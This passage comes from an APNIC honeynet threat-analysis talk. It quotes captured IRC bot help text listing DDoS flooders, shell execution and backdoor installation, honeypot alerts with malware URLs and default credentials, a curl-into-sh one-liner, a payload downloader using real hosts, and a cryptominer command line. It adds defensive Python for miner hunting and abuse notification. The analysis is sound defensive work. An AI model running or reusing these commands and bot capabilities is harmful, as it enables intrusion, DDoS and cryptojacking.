  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^utils/) {
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help:
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example)
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
}
23. Source code of an IRC-based bot: its built-in command help (the bot calls itself a "knight")
Non-spoof / non-root attacks (can run on all bots):
  STD <ip> <port> <time> = A non spoof UDP HIV STD flooder
  HOLD <host> <port> <time> = A vanilla TCP connection flooder
  JUNK <host> <port> <time> = A vanilla TCP flooder (modded)
  UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
  HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
Spoof / root attacks:
  DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
  BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
Bot commands:
  AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically.
  GETIP <iface> = gets the IP address from an interface
  FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
  RNDNICK = Randomizes knight nickname
  NICK <nick> = Changes the nick of the client
  SERVER <server> = Changes servers
  GETSPOOFS = Gets the current spoofing
  SPOOFS <subnet> = Changes spoofing to a subnet
  DISABLE = Disables all packeting from the knight
  ENABLE = Enables all packeting from the knight
  KILL = Kills the knight
  GET <http address> <save as> = Downloads a file off the web
  VERSION = Requests version of knight
  KILLALL = Kills all current packeting
  HELP = Displays this
  IRC <command> = Sends this command to the server
  SH <command> = Executes a command
  BASH <command> = Run a bash command
  ISH <command> = Interactive SH (via privmsg)
  SHD <command> = Daemonize command
  INSTALL <http://server/bin> = Install binary (via wget)
  BINUPDATE <http://server/bin> = Update a binary (via wget)
  LOCKUP <http://server/bin> = Kill telnet, install a backdoor!
24. Linux/Mirai – Fbot
https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html
Honeynet alerts (URL seen, sensor, source IP, credentials used):
2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab-7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech']
2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518']
27. Captured one-liner (fragment as shown on the slide): fetch a remote script and pipe it straight into sh, silently and in the background
curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
28. Snippet of shell script
The downloader picks the 64-bit payload and tries several fallback URLs in turn, some of them files with image extensions on third-party hosting (fragment; the script continues beyond what the slide shows):
if [ ! -f "4d867bd38706a5f7" ]; then
  ARCH=$(getconf LONG_BIT)
  if [ ${ARCH}x = "64x" ]; then
    (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7 ||
     wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7 ||
     curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7 ||
     wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7 ||
     curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7 ||
     wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
29. Find the hash of the sample served from the malware URL
SHA-256: a5fba021a41c520a81647cda41110033eba4f8842eb3239f227bcbb0b1b110d6
31. Rocke Gang
1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916 (May 2019)
2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers (May 2019)
3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect (Oct 2019)
4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/ (Oct 2019)
32. Cryptominer running as the web server user (process listing)
www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
The miner binary sits under the web root, it is pointed at a Monero pool with the attacker's wallet as the user, its output is thrown away through a UDP redirect, and the loop restarts it every second until the file disappears.
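The process listing on slide 32 carries several independent tells (a stratum pool port, a wallet passed as the user, a binary under the web root, a respawn loop, output redirected into /dev/udp), and a hunt script can score them rather than depend on one file name. The following is an added example for this page, not code from the APNIC project. The ps listing it parses is constructed; the pool hostname and the Monero wallet are placeholders built in the same shape as the captured command line, and the port and pool-name lists are my own heuristics.

```python
"""Hunt for cryptominer processes in a `ps aux` listing.

Added example for this page, not code from the APNIC project. The listing is
constructed; the pool hostname and the Monero wallet are placeholders built in
the same shape as the command line captured on the slide.
"""
import re

# Standard Monero address: leading '4' followed by 94 base58 characters (95 total).
XMR_WALLET = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}\b")
# Pool endpoint as miners usually take it: -o host:port or --url=stratum+tcp://host:port
POOL_ARG = re.compile(r"(?:^|\s)(?:-o|--url)[=\s]+(?:stratum\+tcp://)?([\w.-]+):(\d{2,5})")
WALLET_ARG = re.compile(r"(?:^|\s)(?:-u|--user)[=\s]+(\S+)")
STRATUM_PORTS = {3333, 3334, 4444, 5555, 5556, 7777, 8888, 14433, 14444}  # heuristic list
POOL_WORDS = ("pool", "xmr", "monero", "mine", "nanopool", "supportxmr", "hashvault")
MINER_NAMES = ("xmrig", "xmr-stak", "minerd", "cpuminer", "kdevtmpfsi", "kinsing")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/www/")

WALLET = "4A" + "B" * 93  # placeholder, 95 chars, not a real wallet

# Constructed `ps aux` output; the third row mirrors the shape of the slide's process.
SAMPLE_PS = f"""USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169000 11000 ?        Ss   Mar20   0:05 /sbin/init
www-data  1337  0.0  0.0 225000 20000 ?        S    Mar20   0:00 /usr/sbin/apache2 -k start
www-data 17838 99.0  0.0   4452   636 ?        S    Mar20   0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/html/files/media-icons/xm2sg -l /var/www/html/files/media-icons/out.txt -o pool.example-mine.net:4444 -u {WALLET}.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; sleep 1 ; done )'
backup    2222  0.0  0.0  10000  2000 ?        S    Mar20   0:00 curl -s -o /srv/dump.bin --url https://backup.example.net:443/dump
"""


def score_process(cmdline):
    """Return the reasons a command line looks like a miner (empty list if none)."""
    reasons = []
    m = POOL_ARG.search(cmdline)
    if m:
        host, port = m.group(1).lower(), int(m.group(2))
        if port in STRATUM_PORTS or any(w in host for w in POOL_WORDS):
            reasons.append(f"pool endpoint {host}:{port}")
    w = WALLET_ARG.search(cmdline)
    if w and XMR_WALLET.match(w.group(1)):  # match() tolerates the ".worker+difficulty" suffix
        reasons.append("monero wallet passed as -u")
    if any(n in cmdline.lower() for n in MINER_NAMES):
        reasons.append("known miner binary name")
    if any(d in cmdline for d in WRITABLE_DIRS):
        reasons.append("binary under a writable or web-served directory")
    if "while true" in cmdline and "sleep" in cmdline:
        reasons.append("respawn loop")
    if "/dev/udp/" in cmdline:
        reasons.append("output thrown away via /dev/udp")
    return reasons


def parse_ps_aux(text):
    """Split `ps aux` rows into user, pid and the full command (11th column onwards)."""
    procs = []
    for line in text.strip().splitlines()[1:]:  # skip the header row
        parts = line.split(None, 10)
        if len(parts) == 11:
            procs.append({"user": parts[0], "pid": int(parts[1]), "cmd": parts[10]})
    return procs


def find_miners(text, min_reasons=2):
    """Processes with at least min_reasons independent miner indicators."""
    hits = []
    for p in parse_ps_aux(text):
        reasons = score_process(p["cmd"])
        if len(reasons) >= min_reasons:
            hits.append({**p, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_miners(SAMPLE_PS):
        print(hit["user"], hit["pid"], "; ".join(hit["reasons"]))
```

Requiring two independent reasons keeps a backup job that happens to use -o and --url out of the results, while the process from the slide trips five. On a live host the same scoring can be run over /proc/*/cmdline, which also catches miners that have renamed their binary.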
33. Analysis: interesting indicators
• IP addresses of the hosts used for initial access and to run the script that downloads the binary/malware
– Normally compromised systems themselves
• IP addresses of the hosts serving the binary/malware and other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• SSH keys, webshells, group names, IRC #channels
• Miner-related information
• Correlate with other observations, reports, etc.
35. Lessons Learned
• Context: how can we "improve" security?
• Bad practices
o Telnet enabled by default on devices
o Weak or default credentials not removed
o Services not developed securely
o Services not deployed securely (e.g. management interfaces shouldn't be exposed on the Internet)
o No action upon notification ("not our device, it is the customer's")
• Miscreants will exploit the weaknesses and monetize them
36. Source IP (from sensor alert to ASN and AbuseIPDB lookup)
Alert line from a Cowrie sensor, enriched with the ASN and prefix the source address belongs to, then checked against AbuseIPDB:
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21
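Slide 36 turns a source IP into a network owner; the step after that is grouping everything a network sent at the sensors into one notification. The script below is an added example for this page, not code from the APNIC project. Its prefix table is a constructed stand-in for what a Team Cymru, RDAP or RIR lookup would return (documentation prefixes, private-use ASNs, placeholder abuse contacts), and the events are constructed after the slide's alert line. The one point it makes that a plain ASN column does not is longest-prefix matching: when a customer's /26 is announced inside a provider's /24, the notice belongs to the most specific holder.

```python
"""Enrich honeypot source IPs with their covering prefix and draft the notification.

Added example for this page, not code from the APNIC project. The prefix table
is a constructed stand-in for a Team Cymru/RDAP/RIR lookup (documentation
prefixes, private-use ASNs, placeholder abuse contacts); the events are
constructed after the alert line on the slide.
"""
import ipaddress
from collections import defaultdict

# (prefix, ASN, network name, abuse contact): constructed placeholders.
PREFIX_TABLE = [
    ("203.0.113.0/24", 64496, "EXAMPLE-NET-A", "abuse@example-a.net"),
    ("203.0.113.0/26", 64497, "EXAMPLE-CUSTOMER", "abuse@customer.example"),
    ("198.51.100.0/22", 64498, "EXAMPLE-NET-B", "abuse@example-b.net"),
    ("2001:db8::/32", 64499, "EXAMPLE-V6", "abuse@example-v6.net"),
]

# Constructed Cowrie alerts in the shape of the slide's line.
EVENTS = [
    {"timestamp": "2020-10-16T06:53:37.404513Z", "sensor": "cowrie-01", "src_ip": "203.0.113.10", "src_port": 33903, "dest_port": 23},
    {"timestamp": "2020-10-16T06:53:40.000000Z", "sensor": "cowrie-01", "src_ip": "203.0.113.11", "src_port": 33910, "dest_port": 23},
    {"timestamp": "2020-10-16T06:54:02.000000Z", "sensor": "cowrie-02", "src_ip": "203.0.113.200", "src_port": 51000, "dest_port": 22},
    {"timestamp": "2020-10-16T06:55:00.000000Z", "sensor": "cowrie-03", "src_ip": "192.0.2.77", "src_port": 40000, "dest_port": 2323},
]


def build_table(rows):
    return [(ipaddress.ip_network(p), asn, name, contact) for p, asn, name, contact in rows]


TABLE = build_table(PREFIX_TABLE)


def lookup(ip, table=TABLE):
    """Longest-prefix match: the most specific covering prefix names the party to notify."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, asn, name, contact in table:
        if addr.version == net.version and addr in net:
            if best is None or net.prefixlen > best[0].prefixlen:
                best = (net, asn, name, contact)
    return best


def group_by_network(events, table=TABLE):
    """Bucket events by the (prefix, ASN, name, contact) that covers their source IP."""
    groups = defaultdict(list)
    for ev in events:
        hit = lookup(ev["src_ip"], table)
        key = (str(hit[0]), hit[1], hit[2], hit[3]) if hit else ("unknown", None, None, None)
        groups[key].append(ev)
    return dict(groups)


def notification(key, events):
    """Plain-text notice for one network: contact, subject, one line per observation."""
    prefix, asn, name, contact = key
    if asn is None:
        return f"# no covering prefix for {len(events)} event(s); resolve manually"
    lines = [f"To: {contact}",
             f"Subject: Telnet/SSH probes from {prefix} (AS{asn} {name}) against honeypot sensors",
             ""]
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        lines.append(f"{ev['timestamp']} {ev['src_ip']}:{ev['src_port']} -> sensor {ev['sensor']} port {ev['dest_port']}")
    return "\n".join(lines)


if __name__ == "__main__":
    for key, evs in group_by_network(EVENTS).items():
        print(notification(key, evs))
        print()
```

Grouping before sending matters in practice: one notice listing every probe from a prefix is actionable, while a separate e-mail per Cowrie event trains the recipient to ignore them, which is the "no action upon notification" failure on slide 35.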
37. Back to the drawing board?
• Keeping the Internet safe and secure for _everyone_
• Education: users, operators, developers
• Governance
– Incident response
– Roles and responsibilities
– Accountabilities
38. Thank You!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
https://www.unsplash.com/adliwahid